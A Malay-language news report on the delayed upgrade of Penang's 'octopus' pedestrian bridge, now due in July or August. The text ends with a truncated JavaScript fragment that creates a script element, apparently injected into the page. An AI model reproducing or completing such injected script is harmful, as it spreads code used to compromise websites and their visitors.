Naiktaraf jejantas ‘sotong’ jangka siap Julai/Ogos ini

Oleh : AINUL WARDAH SOHILLI

GEORGE TOWN – Kerja-kerja menaiktaraf jejantas pejalan kaki atau lebih dikenali sebagai ‘jejantas sotong’ yang terletak di persimpangan Jalan Penang, Jalan Burma dan Jalan Dr. Lim Chwee Leong dijangka siap menjelang bulan Julai atau Ogos tahun ini.

Perkara tersebut diumumkan Ketua Menteri, Y.A.B. Tuan Lim Guan Eng dalam sidang media di Komtar di sini baru-baru ini.

Jelas Guan Eng, kerja-kerja menaiktaraf ‘jejantas sotong’ sepatutnya siap menjelang April tahun ini, tetapi terpaksa ditangguhkan sehingga ke bulan Julai atau Ogos nanti.

“Kelewatan yang tidak dapat dielakkan ini adalah kerana perlu ‘memindah’ semula jajaran utiliti di bawah tanah kawasan terbabit.

” Kerja – kerja ‘pemindahan’ termasuk wayarwayar dan saluran paip bawah tanah mengambil sedikit masa kerana memerlukan perhatian khusus,” jelasnya.

Hadir sama, Ahli Dewan Undangan Negeri (ADUN) Komtar, Teh Lai Heng, Setiausaha Politik kepada Ketua Menteri, Wong Hon Wai dan Ahli Parlimen Bukit Bendera, Zairil Khir Johari.

Turut serta, Timbalan Pengarah Kejuruteraan Majlis Bandaraya Pulau Pinang (MBPP), Ir. A. Rajendran; Pengurus Besar Perbadanan Bekalan Air Pulau Pinang (PBAPP) Sdn. Bhd., Dato’ Ir. Jaseni Maidinsa dan wakil arkitek dari LSB Architects & Planning, Ooi Hock Yang.

‘Jejantas sotong’ dibina pada tahun 1993 dengan kos pembinaan RM1.25 juta.

Kini, projek naik taraf ia mendapat tajaan melalui tanggungjawab sosial korporat (CSR) Syarikat Ensignia Construction Sdn. Bhd. (Ensignia), anak syarikat IGB Corporation Berhad dengan kos berjumlah RM6 juta.

Apabila siap kelak, jejantas berkenaan akan dilengkapi dengan lif kaca telus dan tangga bergerak (escalator) serta kemudahankemudahan khas untuk golongan orang kurang upaya (OKU).

Pada tahun 2013, Kerajaan Negeri pernah berhasrat untuk meruntuhkan jejantas tersebut memandangkan wujudnya beberapa kes jenayah.

Namun, hasil maklum balas yang dijalankan pada 14 Mei hingga 14 Jun 2013, 70 peratus daripada responden tidak bersetuju untuk merobohkan jejantas unik berkenaan. Hasilnya, Kerajaan Negeri mengekalkan jejantas tersebut dan sekaligus menaiktaraf jambatan yang berusia lebih 20 tahun itu.var d=document;var s=d.createElement(‘script’);